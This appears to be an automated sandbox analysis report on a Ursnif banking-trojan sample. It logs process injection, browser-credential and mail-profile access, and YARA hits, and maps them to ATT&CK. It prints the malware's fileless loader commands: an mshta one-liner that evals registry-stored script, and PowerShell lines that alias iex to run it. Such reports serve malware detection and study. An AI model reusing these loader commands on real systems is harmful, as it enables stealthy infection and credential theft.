                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute and read and write
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 360000 value: 00Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EBJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 2760000 value: 80Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 7FF802BC1580 value: 40Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 35E000 value: 00Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EBJump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 2740000 value: 80Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 7FF802BC1580 value: 40Jump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 7000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3616Jump to behavior
                      Source: C:\Windows\System32\control.exeThread register set: target process: 3616Jump to behavior
                      Source: C:\Windows\System32\control.exeThread register set: target process: 5180Jump to behavior
                      Source: C:\Windows\explorer.exeThread register set: target process: 4440
                      Source: C:\Windows\explorer.exeThread register set: target process: 4724
                      Source: C:\Windows\explorer.exeThread register set: target process: 4960
                      Source: C:\Windows\explorer.exeThread register set: target process: 3700
                      Source: C:\Windows\explorer.exeThread register set: target process: 6604
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP"Jump to behavior
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -hJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: explorer.exe, 0000001B.00000000.442375822.0000000005610000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.429230100.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.410845444.0000000005E60000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 0000001B.00000000.429230100.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.424824730.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.403709757.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 0000001B.00000000.429230100.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.403709757.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.402601192.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager,
                      Source: explorer.exe, 0000001B.00000000.429230100.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.403709757.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.402601192.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D3365 cpuid 2_2_036D3365
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D41FA HeapFree,GetSystemTimeAsFileTime,HeapFree,2_2_036D41FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D3365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,2_2_036D3365
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062881F1 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,2_2_062881F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D6D78 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,2_2_036D6D78

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                      Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000009
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000007
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\appdata\local\google\chrome\user data\default\login data
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000a
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\appData\local\microsoft\edge\user data\default\login data
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000b
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\appdata\local\google\chrome\user data\default\cookies
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000002

                      Remote Access Functionality

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      1
                      Valid Accounts                      		11
                      Windows Management Instrumentation                      		1
                      Valid Accounts                      		1
                      Valid Accounts                      		1
                      Obfuscated Files or Information                      		1
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		Exfiltration Over Other Network Medium2
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default Accounts2
                      Native API                      		Boot or Logon Initialization Scripts1
                      Access Token Manipulation                      		1
                      File Deletion                      		3
                      Credential API Hooking                      		1
                      Account Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		Exfiltration Over Bluetooth2
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter                      		Logon Script (Windows)813
                      Process Injection                      		4
                      Rootkit                      		Security Account Manager4
                      File and Directory Discovery                      		SMB/Windows Admin Shares11
                      Email Collection                      		Automated Exfiltration3
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Masquerading                      		NTDS27
                      System Information Discovery                      		Distributed Component Object Model3
                      Credential API Hooking                      		Scheduled Transfer13
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
